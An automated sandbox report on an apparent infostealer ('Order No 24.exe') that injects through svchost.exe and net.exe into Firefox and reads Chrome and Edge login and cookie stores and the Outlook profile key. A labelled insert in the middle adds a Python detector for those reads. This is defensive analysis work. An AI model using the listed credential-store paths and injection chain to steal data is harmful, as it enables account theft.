                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EF28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009A8189 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtOpenFile: Direct from: 0x77382DCC
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | NtProtectVirtualMemory: Direct from: 0x77377B2E
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe | Thread register set: target process: 592
                Source: C:\Windows\SysWOW64\net.exe | Thread APC queued: target process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                Source: C:\Users\user\Desktop\Order No 24.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3F5008
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009BB106 LogonUserW
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_00983D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009C411C SendInput,keybd_event
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009C74BB mouse_event
                Source: C:\Users\user\Desktop\Order No 24.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order No 24.exe"
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: vqiDHNHvZuv.exe, 00000003.00000002.4576977757.0000000001551000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000000.2190959202.0000000001550000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577408343.0000000001351000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
                Source: Order No 24.exe, vqiDHNHvZuv.exe, 00000003.00000002.4576977757.0000000001551000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000000.2190959202.0000000001550000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577408343.0000000001351000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: vqiDHNHvZuv.exe, 00000003.00000002.4576977757.0000000001551000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000000.2190959202.0000000001550000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577408343.0000000001351000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: Order No 24.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: vqiDHNHvZuv.exe, 00000003.00000002.4576977757.0000000001551000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000000.2190959202.0000000001550000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577408343.0000000001351000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009A65C4 cpuid
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009FB340 GetUserNameW
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_0099DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Order No 24.exe | Binary or memory string: WIN_81
Source: Order No 24.exe | Binary or memory string: WIN_XP
Source: Order No 24.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: Order No 24.exe | Binary or memory string: WIN_XPe
Source: Order No 24.exe | Binary or memory string: WIN_VISTA
Source: Order No 24.exe | Binary or memory string: WIN_7
Source: Order No 24.exe | Binary or memory string: WIN_8
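The rows above are the detection a defender actually wants to reproduce: a signed Windows binary, net.exe, opening the Chrome and Edge "Login Data", "Cookies", "Web Data" and "Local State" files and the Outlook MAPI profile key. Because the reader is a copied system binary rather than a dropped payload, allow-listing by signer or image name does not help; the check has to pair the target path with the originating image. The following Python is an added example modelled on those rows, not Joe Sandbox code. The events are constructed, and the browser and mail allow-lists (chrome.exe, msedge.exe, outlook.exe) are assumptions a real deployment would tune.

```python
"""Flag non-browser processes reading browser credential stores and the Outlook
MAPI profile key. Added example modelled on the report rows; not Joe Sandbox code."""
from pathlib import PureWindowsPath

# File names Chromium-based browsers use for saved logins, cookies, autofill
# and the DPAPI-wrapped master key (names taken from the report's rows).
BROWSER_STORES = {"login data", "cookies", "web data", "local state"}
# Profile roots those files live under (lower-case, backslash-separated).
BROWSER_DIRS = ("google\\chrome\\user data", "microsoft\\edge\\user data")
# Assumed allow-list of images with a legitimate reason to open those files.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}
# Outlook profile key from the report (lower-case, without the hive prefix).
OUTLOOK_PROFILES = ("software\\microsoft\\windows nt\\currentversion\\"
                    "windows messaging subsystem\\profiles")
MAIL_IMAGES = {"outlook.exe"}  # assumed allow-list


def is_browser_store(path):
    """True if `path` is one of the credential stores under a browser profile."""
    p = PureWindowsPath(path)
    parent = str(p.parent).lower()
    return p.name.lower() in BROWSER_STORES and any(d in parent for d in BROWSER_DIRS)


def is_outlook_profile_key(key):
    """True if `key` is (or is under) the Outlook MAPI profile key in HKCU."""
    return key.lower().rstrip("\\").startswith("hkey_current_user\\" + OUTLOOK_PROFILES)


def triage(events):
    """Return alerts for file/registry opens by images outside the allow-lists.

    Each event is {"image": <full path>, "op": "file_open" | "reg_open", "target": <path or key>}.
    """
    alerts = []
    for ev in events:
        image = PureWindowsPath(ev["image"]).name.lower()
        if ev["op"] == "file_open" and is_browser_store(ev["target"]) and image not in BROWSER_IMAGES:
            alerts.append({"image": ev["image"], "reason": "browser-credential-store-read",
                           "target": ev["target"]})
        elif ev["op"] == "reg_open" and is_outlook_profile_key(ev["target"]) and image not in MAIL_IMAGES:
            alerts.append({"image": ev["image"], "reason": "mapi-profile-access",
                           "target": ev["target"]})
    return alerts


# Constructed events: the first three mirror the report's net.exe rows, the last
# two are benign controls (the browser reading its own store; an unrelated file).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\SysWOW64\net.exe", "op": "file_open",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\net.exe", "op": "file_open",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"image": r"C:\Windows\SysWOW64\net.exe", "op": "reg_open",
     "target": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
               "Windows Messaging Subsystem\\Profiles\\Outlook\\"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "op": "file_open",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\net.exe", "op": "file_open",
     "target": r"C:\Users\user\Documents\notes.txt"},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"{a['reason']}: {a['image']} -> {a['target']}")
```

Run against the constructed events it raises three alerts, all for net.exe, and stays silent for chrome.exe reading its own Login Data. Feed it real file-open and registry-open telemetry (Sysmon event IDs 11/12-13 or an EDR's equivalent) and tune the allow-lists to the browsers and mail clients actually deployed.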

                Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.490000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
